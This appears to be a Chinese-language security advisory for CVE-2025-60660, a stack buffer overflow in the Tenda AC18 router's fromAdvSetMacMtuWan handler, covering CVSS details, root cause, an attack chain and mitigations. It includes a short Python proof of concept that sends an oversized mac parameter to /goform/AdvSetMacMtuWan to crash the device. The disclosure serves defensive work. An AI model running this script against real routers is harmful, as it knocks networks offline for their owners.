CVE-2025-60660：Tenda AC18路由器栈溢出漏洞

漏洞信息

漏洞编号

CVE-2025-60660

漏洞类型

栈缓冲区溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tenda AC18 路由器

漏洞概述

CVE-2025-60660是Tenda AC18路由器（固件版本V15.03.05.19）中存在的一个高危栈缓冲区溢出漏洞。该漏洞位于路由器的fromAdvSetMacMtuWan函数中，攻击者可以通过精心构造的mac参数触发栈溢出，从而导致设备崩溃或远程代码执行。CVSS 3.1评分为7.5分，属于高危级别，攻击者无需认证即可通过网络远程利用该漏洞，无需任何用户交互，成功利用后将导致路由器完全不可用（可用性影响为高）。Tenda AC18是一款广泛使用的家用双频无线路由器，在全球市场拥有大量用户，因此该漏洞的影响范围较大。攻击者可以利用该漏洞对目标路由器发起拒绝服务攻击，破坏家庭或小型办公网络的基础设施，甚至可能导致设备永久损坏。鉴于该漏洞利用门槛低、影响严重，安全研究人员和管理员应及时关注并采取相应的防护措施。由于该漏洞影响的是网络边界设备，攻击者可以从互联网直接发起攻击，进一步增加了其危害性。

技术细节

该漏洞的根本原因在于fromAdvSetMacMtuWan函数在处理用户传入的mac参数时，未对输入长度进行充分的边界检查，直接将用户提供的数据复制到固定大小的栈缓冲区中。当攻击者构造超长mac参数（如超过缓冲区容量的字符串）并通过HTTP请求发送给路由器时，数据会覆盖栈上的返回地址和其他关键数据，从而触发栈缓冲区溢出。攻击者可以通过以下方式利用该漏洞：1）构造包含超长mac参数的HTTP GET或POST请求，发送到路由器的管理接口；2）由于该漏洞无需认证（PR:N），攻击者无需提供任何凭据即可访问相关接口；3）栈溢出可能导致程序执行流被劫持，触发崩溃或执行任意代码。CVSS向量显示该漏洞对机密性影响较低（C:L），对完整性无影响（I:N），但对可用性影响高（A:H），这意味着最直接的影响是拒绝服务攻击。攻击者可以利用此漏洞使路由器持续崩溃，导致整个网络瘫痪。修复方案应包括在fromAdvSetMacMtuWan函数中添加对mac参数长度的严格验证，确保输入数据不超过缓冲区容量。

攻击链分析

STEP 1

步骤1：目标识别

攻击者通过扫描互联网或局域网，识别运行Tenda AC18固件版本V15.03.05.19的路由器设备，确定潜在的攻击目标。

STEP 2

步骤2：构造恶意请求

攻击者构造包含超长mac参数的HTTP请求，该参数长度超过fromAdvSetMacMtuWan函数中栈缓冲区的容量，为栈溢出做准备。

STEP 3

步骤3：发送攻击载荷

攻击者通过HTTP GET/POST请求将恶意mac参数发送到/goform/AdvSetMacMtuWan接口，由于无需认证，可直接远程访问。

STEP 4

步骤4：触发栈溢出

路由器接收并处理请求时，超长mac参数覆盖栈上的返回地址和关键数据，触发栈缓冲区溢出漏洞。

STEP 5

步骤5：拒绝服务

栈溢出导致路由器进程崩溃，设备失去响应，造成网络中断。攻击者可重复发起攻击使设备持续不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-60660 - Tenda AC18 Stack Overflow PoC
# Vulnerability: Stack buffer overflow via mac parameter in fromAdvSetMacMtuWan function
# Affected: Tenda AC18 V15.03.05.19

import requests
import sys

TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.0.1"
# Overflow payload - excessive length to trigger stack overflow in mac parameter
OVERFLOW_SIZE = 2048
payload = "A" * OVERFLOW_SIZE

url = f"{TARGET}/goform/AdvSetMacMtuWan"
params = {
    "mac": payload,
    "mtu": "1500"
}

try:
    print(f"[*] Sending exploit to {url}")
    response = requests.get(url, params=params, timeout=10)
    print(f"[*] Response status: {response.status_code}")
    print("[+] Exploit sent - target may crash if vulnerable")
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed (target may have crashed): {e}")
    print("[+] Target appears to be vulnerable - device crashed")

影响范围

Tenda AC18 V15.03.05.19

防御指南

临时缓解措施

在厂商发布正式修复补丁之前，建议用户采取以下临时缓解措施：1）将路由器管理界面的访问限制在可信内网，避免从互联网直接暴露；2）在防火墙中配置规则，阻止外部网络对路由器管理端口（通常为80/443）的直接访问；3）监控路由器日志，识别异常的/goform/AdvSetMacMtuWan请求；4）如非必要，可临时关闭路由器的远程管理功能；5）考虑使用VLAN隔离或网络分段，将IoT设备和路由器管理流量与主网络分离。